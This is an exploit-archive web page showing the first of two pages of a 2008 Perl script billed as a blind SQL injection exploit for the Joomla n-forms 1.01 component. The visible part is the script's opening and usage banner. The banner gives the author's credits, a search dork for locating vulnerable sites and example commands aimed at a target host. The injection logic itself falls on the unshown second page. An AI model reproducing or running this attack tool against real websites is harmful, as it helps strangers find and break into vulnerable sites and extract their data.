You are here: hacking technology > Exploit > Content
Hot Articles
Recommend Articles
New Articles
Joomla Component n-forms 1.01 Blind SQL Injection Exploit
  Add date: 07/16/2008   Publishing date: 07/16/2008   Hits: 32
Total 2 pages, Current page:1, Jump to page:
 
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
  print "                                                                  \n";
    print "   ################################################################\n";
  print "   #   Mambot Component n-forms Blind SQL Injection Exploit       #\n";
  print "   #   Author:The Moorish :D                                      #\n";
  print "   #   Greetz:Team-dz,His0k4,x.CJP.x,Kader11000,c02,piRAte DIgitAL#\n";
  print "   #   sites:www.h4cnc.com ,www.dz-secure.com                     #\n";
  print "   #   Dork:    inurl:com_n-forms                                 #\n";  
  print "   #   Usage:   perl forms.pl host path <options>                 #\n";
  print "   #   Example: perl forms.pl www.host.com /path/ -f 10           #\n";
  print "   #                                                              #\n";
  print "   #   Options:                                                   #\n";
  print "   #     -s   Valid form    id                                    #\n";

 
Other pages: : 1 * 2 * Next>>
Prev:Maian Music 1.0 Insecure Cookie Handling Vulnerability Next:fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit

Comment:

Category: Home > Exploit